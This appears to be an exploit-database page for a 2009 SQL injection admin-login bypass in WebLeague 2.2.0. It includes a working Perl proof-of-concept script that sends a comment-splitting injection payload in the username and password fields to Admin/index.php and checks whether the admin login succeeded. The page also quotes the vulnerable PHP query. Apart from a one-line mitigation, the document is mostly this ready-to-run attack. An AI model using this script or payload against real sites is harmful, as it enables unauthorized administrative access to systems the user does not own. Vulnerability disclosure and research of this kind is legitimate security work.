header-logo
Suggest Exploit
vendor:
WebLeague 2.2.0
by:
ka0x
7,5
CVSS
HIGH
Remote Admin Bypass
89
CWE
Product Name: WebLeague 2.2.0
Affected Version From: 2.2.0
Affected Version To: 2.2.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2009

WebLeague 2.2.0 Remote Admin Bypass p0c

This exploit is based on the vulnerability in WebLeague 2.2.0, which allows an attacker to bypass the authentication process and gain access to the admin panel. The vulnerability is due to the fact that the application does not properly sanitize the user input, allowing an attacker to inject malicious code into the username and password fields. The exploit code uses a POST request to send malicious code to the application, which is then executed by the application.

Mitigation:

The application should properly sanitize user input to prevent malicious code injection.
Source

Exploit-DB raw data:

#!/usr/bin/perl -W
#
# WebLeague 2.2.0 Remote Admin Bypass p0c
# written by ka0x <ka0x01[at]gmail.com>
#
# need magic_quotes_gpc = Off
#
# Vuln code (Admin/index.php) :
#
# 10:	$sql="SELECT * FROM $admintable WHERE name = '$_POST[username]' AND password = '$_POST[password]'"; // ---> NOT CLEAN $_POST VARS
# 11:	$result=mysql_query($sql,$db);
# 12:	$number = mysql_num_rows($result);
# 13:	if ($number == "1") {
#

use LWP::UserAgent ;

my $timeout = 10 ;

die "* USAGE: \tperl $0 <host>\n" unless $ARGV[0] ;

my $host = $ARGV[0] ;

$host = 'http://'.$host if( $host !~ /^http:/ ) ;
$host = $host.'/' unless( substr( $host, -1 ) eq '/' ) ;

my $ua = LWP::UserAgent->new() or die;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
$ua->timeout( $timeout ) ;

my $req = HTTP::Request->new( POST => $host.'Admin/index.php' );
$req->content_type( 'application/x-www-form-urlencoded' ) ;
$req->content( 'username=\'/*&password=*/ or \'\'=\'' ) ; 	# content $_POST vars: 
								# username=  '/*
								# password=   */ or ''='
my $res = $ua->request( $req ) ;

if( $res->content =~ /You are logged in as/i ){
	print "[+] The website is vulnerable." ;
} 
else {
	print "[-] The website isn't vulnerable." ;
}


__END__

# milw0rm.com [2009-07-16]

Navigation

Suggest Exploit

Services By CQR